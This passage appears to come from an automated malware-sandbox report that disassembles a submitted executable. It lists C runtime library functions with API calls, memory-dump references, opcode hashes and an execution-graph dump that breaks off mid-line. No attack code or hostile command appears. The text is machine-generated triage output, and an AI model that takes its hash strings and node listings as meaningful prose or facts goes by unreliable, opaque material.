                                                                                                                                                                                                      • Opcode ID: d5c7a10002ca50355fb61ab0e6f22f947540c863035a87c97bf652e5527330ec
                                                                                                                                                                                                      • Instruction ID: 4503c5fab465be3e77f3ab9a23cbf15d730b4d297a47647c0e0a1dfdf037a5ff
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5c7a10002ca50355fb61ab0e6f22f947540c863035a87c97bf652e5527330ec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD018271A0261197CB21AB6BA80675A7760BB04714F05047BE800773D1C73C9D619FD9
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00407ECE Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __lock.LIBCMT ref: 00407EEC
                                                                                                                                                                                                        • Part of subcall function 0040B021: __mtinitlocknum.LIBCMT ref: 0040B037
                                                                                                                                                                                                        • Part of subcall function 0040B021: __amsg_exit.LIBCMT ref: 0040B043
                                                                                                                                                                                                        • Part of subcall function 0040B021: EnterCriticalSection.KERNEL32(?,?,?,0040981D,00000004,005D2420,0000000C,0040BE29,?,?,00000000,00000000,00000000,?,0040A51E,00000001), ref: 0040B04B
                                                                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 00407EF7
                                                                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 00407F06
                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,005D23C0,0000000C,0040B002,00000000,005D24F8,0000000C,0040B03C,?,?,?,0040981D,00000004,005D2420,0000000C), ref: 00407F36
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0040981D,00000004,005D2420,0000000C,0040BE29,?,?,00000000,00000000,00000000,?,0040A51E,00000001,00000214), ref: 00407F47
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2714421763-0
                                                                                                                                                                                                      • Opcode ID: 1affc71a82c9321a36d9c7581778b495fef3fa647ddc123e292e07e01a08f03b
                                                                                                                                                                                                      • Instruction ID: c2a7b450f71c5985e0bf6910fb292852cfe500300070e7457171674023845dc0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1affc71a82c9321a36d9c7581778b495fef3fa647ddc123e292e07e01a08f03b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3014431D09206EADF217BB2AC06B5E3B64AF00724F20417FF614B61D1CA3C99459A9E
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040D9C3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040835A), ref: 0040D9C8
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040D9D8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                                                                                      • Opcode ID: 56b4dd67aa28d0270ad47457a49c6e109402388cba18dcb7490fbf9853a3e004
                                                                                                                                                                                                      • Instruction ID: 3adbb724ebf3aacfc5fdfb6c6b3c1da491be98603761976f4331c8c24da7194c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56b4dd67aa28d0270ad47457a49c6e109402388cba18dcb7490fbf9853a3e004
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13F03070A00A09E2DF002FE1BE1E76F7A78BB80706F9205B1D5D2B01D4DF7484B9825E
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00406766 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00406780
                                                                                                                                                                                                        • Part of subcall function 0040A56C: __getptd_noexit.LIBCMT ref: 0040A56F
                                                                                                                                                                                                        • Part of subcall function 0040A56C: __amsg_exit.LIBCMT ref: 0040A57C
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00406791
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0040679F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                      • String ID: MOC
                                                                                                                                                                                                      • API String ID: 803148776-624257665
                                                                                                                                                                                                      • Opcode ID: fb8c3504542e4ead8e18bb6b17f7fb4facecd1aac5d8d28e4f66fc5d461b71a2
                                                                                                                                                                                                      • Instruction ID: f7ce04b09f88ea8bf92b9c9145b32e90dda9830af457c7117f7f413b5d6e582e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb8c3504542e4ead8e18bb6b17f7fb4facecd1aac5d8d28e4f66fc5d461b71a2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41E01A351102049FC710EA75C446B2932A4FB98318F2A01B6A449D73A3C73CE864999B
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040A912 Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __flush.LIBCMT ref: 0040A9D6
                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040A9F6
                                                                                                                                                                                                      • __locking.LIBCMT ref: 0040A9FD
                                                                                                                                                                                                      • __flsbuf.LIBCMT ref: 0040AA28
                                                                                                                                                                                                        • Part of subcall function 00407D04: __getptd_noexit.LIBCMT ref: 00407D04
                                                                                                                                                                                                        • Part of subcall function 00407C9C: __decode_pointer.LIBCMT ref: 00407CA7
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3240763771-0
                                                                                                                                                                                                      • Opcode ID: 4abcd3e90e3eeff08e5f6d1d1a7d2ca56d7ab9a9c0e65f050a082b580b217641
                                                                                                                                                                                                      • Instruction ID: 6b185403a09135d3cdfe71ca90db48756e84bdf2f1615a13fe70eddab420801c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4abcd3e90e3eeff08e5f6d1d1a7d2ca56d7ab9a9c0e65f050a082b580b217641
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E41D271B00705ABDB24DF6A894459FBBB1AF80320B25853AE455B72C0E738DE61CF4A
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004101E0 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00410214
                                                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00410248
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00410279
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004102E7
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                                                      • Opcode ID: 3094912399eafe4c9120304394b683b5c6838703fbbcbcabab58bc919b0b3da0
                                                                                                                                                                                                      • Instruction ID: 960adf5eefed5afcf71e394529e192730cd826e97c9618db805dfe3d2f05c971
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3094912399eafe4c9120304394b683b5c6838703fbbcbcabab58bc919b0b3da0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F31A231900345EFDB20DFA4C8889FB3BA5AF05310F1485EAE4659B295D3B4DDC1DB59
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040D8AF Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                      • Instruction ID: 9d379b0f9b63e5e7efc0ae3dc1d7e3a920820ee5fe13a46407f56c0e058609a7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3117E7280004EBBCF125FC5DC05CEE3F22BB19354B588426FA1869171C23AC9B5AB89
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00405F99 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00405FB3
                                                                                                                                                                                                        • Part of subcall function 00407E04: __FF_MSGBANNER.LIBCMT ref: 00407E27
                                                                                                                                                                                                        • Part of subcall function 00407E04: __NMSG_WRITE.LIBCMT ref: 00407E2E
                                                                                                                                                                                                        • Part of subcall function 00407E04: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000001,?,004051CE,00000001,?,?,?,?,?,00403CDF,?), ref: 00407E7B
                                                                                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00405FD6
                                                                                                                                                                                                        • Part of subcall function 00405F7E: std::exception::exception.LIBCMT ref: 00405F8A
                                                                                                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 00405FEA
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00405FF8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1411284514-0
                                                                                                                                                                                                      • Opcode ID: d951278054cfe522775f70655d549f723877a08e51c399a84401819e538b49d1
                                                                                                                                                                                                      • Instruction ID: e0addd6f77398e2ef15ee5c24ce697e48ca5abe13a041db92bcb68d774908759
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d951278054cfe522775f70655d549f723877a08e51c399a84401819e538b49d1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58F0E231A0591A62CB14B766EC0699B3B98DB0031CB1400BBFC01BA2D1EF3C9E05858D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040F10D Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0040F119
                                                                                                                                                                                                        • Part of subcall function 0040A56C: __getptd_noexit.LIBCMT ref: 0040A56F
                                                                                                                                                                                                        • Part of subcall function 0040A56C: __amsg_exit.LIBCMT ref: 0040A57C
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0040F130
                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 0040F13E
                                                                                                                                                                                                      • __lock.LIBCMT ref: 0040F14E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3521780317-0
                                                                                                                                                                                                      • Opcode ID: 6b3ce3f6d2b60aec49528a0569f0e2bc54c7890dd6c859b36278b5f41fe69c72
                                                                                                                                                                                                      • Instruction ID: 02dd47f1232a967a6620a44f67286bc153f77ac22c8bb58f6a868c1d9a4322db
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b3ce3f6d2b60aec49528a0569f0e2bc54c7890dd6c859b36278b5f41fe69c72
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCF04932901700DAD630BBA6C80275A33A0AB40729F14413FE480BB6D2CB3CAC499E9E
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00406B50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 004065C9: __getptd.LIBCMT ref: 004065CF
                                                                                                                                                                                                        • Part of subcall function 004065C9: __getptd.LIBCMT ref: 004065DF
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00406B5F
                                                                                                                                                                                                        • Part of subcall function 0040A56C: __getptd_noexit.LIBCMT ref: 0040A56F
                                                                                                                                                                                                        • Part of subcall function 0040A56C: __amsg_exit.LIBCMT ref: 0040A57C
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00406B6D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1679278036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679266991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679278036.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679390445.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1679443513.0000000000687000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_klWGq3yDcQ.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 803148776-1018135373
                                                                                                                                                                                                      • Opcode ID: e424a0896c80f3f9fdcf6ce60fb0fcfd85ca7a1a309b3671b1e8155142a597e3
                                                                                                                                                                                                      • Instruction ID: da7cc3cbec5f761aee6c8faca9a410b090dd5b739f3c5e14fd933f613c3b4d6f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e424a0896c80f3f9fdcf6ce60fb0fcfd85ca7a1a309b3671b1e8155142a597e3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74014F768112149ACF349F25D44566EB3B5AF14321F15443FE092BA6D1CB3CAAB4CF19
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:24.5%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                      Total number of Nodes:194
                                                                                                                                                                                                      Total number of Limit Nodes:22
                                                                                                                                                                                                      execution_graph 863 6c6028 885 6957ba 863->885 865 6c6033 ___fls_getvalue@4 __threadstartex@4 867 6c6051 __IsNonwritableInCurrentImage 865->867 906 6957ee 865->906 889 6c5fe7 867->889 870 6c60bf 909 694a2f 870->909 871 6c60db 873 6957ba ___set_flsgetvalue 74DEF550 871->873 877 6c60e1 __calloc_crt 873->877 876 6c6103 882 6c60d4 876->882 915 694a87 876->915 877->876 897 6959a8 877->897 880 6c6145 880->882 921 694a55 880->921 886 6957c9 885->886 887 6957da 886->887 926 69571f 886->926 887->865 890 6c5ff3 __initptd 889->890 891 6959a8 __getptd 13 API calls 890->891 892 6c5ff8 891->892 930 6c5faa 892->930 898 69592f __getptd_noexit 6 API calls 897->898 899 6959b0 898->899 901 6959bd 899->901 960 696640 899->960 902 695848 901->902 903 695854 __crt_waiting_on_module_handle __initptd 902->903 904 695882 74DEF550 74DEF550 903->904 905 6958a6 ___addlocaleref __initptd 903->905 904->905 905->876 907 69571f __decode_pointer 74DEF550 906->907 908 695804 907->908 908->867 910 69592f __getptd_noexit 6 API calls 909->910 911 694a34 910->911 912 69452f 911->912 913 69571f __decode_pointer 74DEF550 912->913 914 69453f __invoke_watson 913->914 917 694a93 ___sbh_find_block __initptd 915->917 916 694a2f _strcpy_s 6 API calls 919 694afe __dosmaperr __initptd 916->919 918 694ac4 __getptd_noexit 917->918 917->919 1061 699bfc 917->1061 918->916 918->919 919->880 1073 694a42 921->1073 923 694a60 __dosmaperr 924 694a2f _strcpy_s 6 API calls 923->924 925 694a73 924->925 925->882 927 695733 __crt_waiting_on_module_handle 926->927 928 695773 74DEF550 927->928 929 695750 927->929 928->929 929->887 931 6c5fb8 __IsNonwritableInCurrentImage 930->931 945 69592f 931->945 935 6c5fdc __initptd 936 6959a8 __getptd 13 API calls 935->936 937 6c5ff8 936->937 938 6c5faa __endthreadex 13 API calls 937->938 939 6c6008 938->939 940 6970ec __XcptFilter 6 API calls 939->940 941 6c6008 940->941 942 6970ec 941->942 943 69592f __getptd_noexit 6 API calls 942->943 944 6970f9 943->944 944->870 944->871 946 695939 945->946 947 6957ba ___set_flsgetvalue 74DEF550 946->947 949 695946 __calloc_crt 947->949 948 695983 948->935 956 695af1 948->956 949->948 950 69571f __decode_pointer 74DEF550 949->950 951 695974 950->951 952 69597b 951->952 953 695993 951->953 954 695848 __initptd 2 API calls 952->954 955 694a87 __getptd_noexit 6 API calls 953->955 954->948 955->948 958 695b3f 956->958 959 695aff 956->959 957 69571f __decode_pointer 74DEF550 957->958 958->935 959->957 967 696cad 960->967 964 696652 965 69571f __decode_pointer 74DEF550 964->965 966 69665d 965->966 966->901 994 69d2c2 967->994 970 69d2c2 __set_error_mode 6 API calls 972 696cc1 970->972 971 696b02 __NMSG_WRITE 13 API calls 973 696cd9 971->973 972->971 974 69664a 972->974 975 696b02 __NMSG_WRITE 13 API calls 973->975 976 696b02 974->976 975->974 977 696b16 976->977 978 696c71 _strlen 977->978 979 69d2c2 __set_error_mode 6 API calls 977->979 978->964 980 696b38 979->980 980->978 981 69d2c2 __set_error_mode 6 API calls 980->981 982 696b49 981->982 982->978 1000 696155 982->1000 984 696b7d __invoke_watson 985 696155 _strcpy_s 6 API calls 984->985 986 696bbf __invoke_watson _strlen 984->986 985->986 992 696c02 __invoke_watson 986->992 1045 69d20d 986->1045 988 696c28 __invoke_watson 990 69d199 _strcat_s 6 API calls 988->990 991 696c4d __invoke_watson 990->991 1018 69d030 991->1018 1009 69d199 992->1009 995 69d2d1 994->995 996 696cb4 995->996 997 694a2f _strcpy_s 6 API calls 995->997 996->970 996->972 998 69d2f4 997->998 999 69452f _strcpy_s 74DEF550 998->999 999->996 1001 696166 1000->1001 1003 69616d 1000->1003 1001->1003 1007 696193 1001->1007 1002 694a2f _strcpy_s 6 API calls 1004 696172 1002->1004 1003->1002 1005 69452f _strcpy_s 74DEF550 1004->1005 1006 696181 1005->1006 1006->984 1007->1006 1008 694a2f _strcpy_s 6 API calls 1007->1008 1008->1004 1010 69d1b1 1009->1010 1013 69d1aa 1009->1013 1011 694a2f _strcpy_s 6 API calls 1010->1011 1012 69d1b6 1011->1012 1014 69452f _strcpy_s 74DEF550 1012->1014 1013->1010 1016 69d1e5 1013->1016 1015 69d1c5 1014->1015 1015->988 1016->1015 1017 694a2f _strcpy_s 6 API calls 1016->1017 1017->1012 1054 695716 1018->1054 1021 69d053 74DF0BD0 1022 69d068 74DEF550 1021->1022 1023 69d17d 1021->1023 1022->1023 1025 69d07e 1022->1025 1023->978 1024 69d0db 1028 69571f __decode_pointer 74DEF550 1024->1028 1042 69d105 1024->1042 1057 6956a4 1025->1057 1026 69571f __decode_pointer 74DEF550 1026->1023 1027 69571f __decode_pointer 74DEF550 1037 69d148 1027->1037 1030 69d0f8 1028->1030 1032 69571f __decode_pointer 74DEF550 1030->1032 1032->1042 1033 6956a4 __encode_pointer 74DEF550 1034 69d099 74DEF550 1033->1034 1035 6956a4 __encode_pointer 74DEF550 1034->1035 1036 69d0ae 74DEF550 1035->1036 1038 6956a4 __encode_pointer 74DEF550 1036->1038 1039 69571f __decode_pointer 74DEF550 1037->1039 1041 69d130 1037->1041 1040 69d0c3 1038->1040 1039->1041 1040->1024 1043 69d0cd 74DEF550 1040->1043 1041->1026 1042->1027 1042->1041 1044 6956a4 __encode_pointer 74DEF550 1043->1044 1044->1024 1049 69d21f 1045->1049 1046 69d223 1047 69d228 1046->1047 1048 694a2f _strcpy_s 6 API calls 1046->1048 1047->992 1050 69d23f 1048->1050 1049->1046 1049->1047 1052 69d269 1049->1052 1051 69452f _strcpy_s 74DEF550 1050->1051 1051->1047 1052->1047 1053 694a2f _strcpy_s 6 API calls 1052->1053 1053->1050 1055 6956a4 __encode_pointer 74DEF550 1054->1055 1056 69571d 1055->1056 1056->1021 1056->1024 1060 6956b8 __crt_waiting_on_module_handle 1057->1060 1058 6956f8 74DEF550 1059 6956d5 74DEF550 1058->1059 1059->1033 1060->1058 1060->1059 1062 699c3b 1061->1062 1068 699edd 1061->1068 1063 699e27 74DEF4C0 1062->1063 1062->1068 1064 699e8b 1063->1064 1065 699e9a 74DEF4C0 1064->1065 1064->1068 1066 699eb8 1065->1066 1069 695df0 1066->1069 1068->918 1070 695e08 1069->1070 1071 695e2f __VEC_memcpy 1070->1071 1072 695e37 1070->1072 1071->1072 1072->1068 1074 69592f __getptd_noexit 6 API calls 1073->1074 1075 694a47 1074->1075 1075->923 1076 696b02 1077 696b16 1076->1077 1078 696c71 _strlen 1077->1078 1079 69d2c2 __set_error_mode 6 API calls 1077->1079 1080 696b38 1079->1080 1080->1078 1081 69d2c2 __set_error_mode 6 API calls 1080->1081 1082 696b49 1081->1082 1082->1078 1083 696155 _strcpy_s 6 API calls 1082->1083 1084 696b7d 